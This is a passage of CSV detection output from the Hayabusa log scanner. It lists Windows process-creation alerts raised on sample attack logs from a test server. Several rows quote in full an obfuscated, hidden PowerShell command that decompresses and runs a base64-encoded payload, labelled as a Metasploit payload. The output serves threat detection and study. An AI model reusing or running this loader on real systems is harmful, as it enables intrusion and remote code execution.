System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1140 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.280 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:43.345 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:43.345 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAPU7gGACA7VW+2/aSBD+OZHyP1gVErZKsHlcEyJVurUdHk0gBof3odNiL/Y2ay+xFwjp9X+/WbDbVE3v2pPO4rGPmdmZb76d8WoTe4LyWBG1Zah8Ojs9cXCCI0UtPH5YlZQCtWhLOzmB9ULwUXmvqHO0Xts8wjReXF1ZmyQhsTjOyy0iUJqSaMkoSVVN+UsZhyQh53fLj8QTyiel8Ge5xfgSs0xsb2EvJMo5in25d8s9LH0pu2tGhVr844+iNj+vLMrXjxvMUrXo7lNBorLPWFFTPmvywPv9mqjFLvUSnvKVKI9pXKuWh3GKV6QH1rakS0TI/bSoQQzwSYjYJLEC0Uj146ZahKGTcA/5fkLStFhS5tLwfLH4XZ1npw42saARKXdiQRK+dkmypR5Jy20c+4wMyGoBWq5IaBwsNA3EtvyBqIV4w1hJ+RUzao/scsx+Vkl9qQRSjki0EiTxuyi73N8wctQrvuKmTLsGT556QO3z2enZ6SrnCd42ti95AqOT+WFMwDfV4Sk9yL1XjJLShXOw4MkepoX7ZEO0xRdklUJqL0s/Vq/ksiD53DD2EazNR5z6C9DJkll4vJSrP6akTVY0JvY+xhH1ctapryFMVowcIiznYj3wSS1mG8S3CSMBFhI1mejv1K4jKr7omhvKfJIgD7KUgleQQO1bZ46JUIuduEsiQOg4B+YVVsB1kktn/N7np8s5CBUthtO0pDgbuGxeSXEJZsQvKShOabaFNoIfhsWv7nY3TFAPpyI3t9COKGanWTxORbLxIGUQ+b27Jh7FTAJRUtrUJ+bepUF+avFVGCzMGFwBsLSFNMCKDN8VkggJOCiTrpVdIjrRmpEIRA5XvslwABc84/mBODggfvFb93IeH0krYcjjf+Ec5NZlXJSUEU0E1A0J6YE//+nwFxUD3LASkuVAzS/G3NwLSedC0AieJRkzSA4AJAKCbyY8MnFK3tWP1UF9o99RB8EztdvurCPcLnztTsxopTPsri4dYfCI1jq861mp02peIroLdt5lD3n+B580XJDrU6NziXzrtt8OJ6FnGveoDWvBdNgR0w5q34ceMxy7rbvT1KC79ljaOtrw6vX2xEC1Wv2uZjwAblNaCR6Q34vo7ukWxlAG727NTmoaHXb9wRosx9XmbMzaer0ZrsY8dd9NbV3XGz62u3uETO7XuvtJZcDv215k1mOuN6z6A7pGyIqvR02T30zNBDn6CAdrboX+hVUNLIRaF5TM+sOm2e83TTRsfXy0G3qgN8YTHJrjUZXO1pNBCPPmrt2/0Y16xyfPfLYD4Foc4WAAMoFV9cIVyNhvkfm2x9MqfjA5MkGmOXtErXC6bjoM9u+HVY5GrDfB6Ha2b+p6ZerUUdvg41aA+iCOA7OPUbq1n229MvK5P/6tN13powm70G2r74QTGbO+juTvrm3feLPKzru7qJvGoxXRiC2rvt4YXprx7iZwtoHfH18Mnnr7JZw71PXRG8kmoFPBC8d+5QVRflTbuzhJQ8yAQFC28/va5Ekzq8QOp1JDVQ+d+4EkMWHQ+qA55sxHjHFPtoFDzYYWdGwMsk8NYVirvjrSlC+C2tcGkS9dXc3AS7hKku7lWxIHIiwZTzXDgHJvPNUNCPPnI7P4eq8eTJVkuzhikxtnB+OavGSFVMTx/4tZdrVD+PP/DbOva/+w+1M4GqUs5u/Wv134JVR/OfYxpgIkXShOjBz74usQZAx58d4gEwP5X2WPfOm724jzHrxOnJ3+DTnHlctdCgAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | PID: 0x13b8 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:46.597 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:56:47.113 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:56:47.113 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x112c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:57:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:57:03.030 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x11e4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.005 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:58:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:58:03.023 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x158c | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 14:59:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 14:59:03.029 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x13c4 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.014 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.031 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5140-5145,4688,4697-Encrypted payload deployed with service over SMB (GLOBAL).evtx" +2021-04-21 15:00:03.228 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4688-Encoded PowerShell MSF payload via process execution.evtx +2021-04-21 15:00:03.228 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 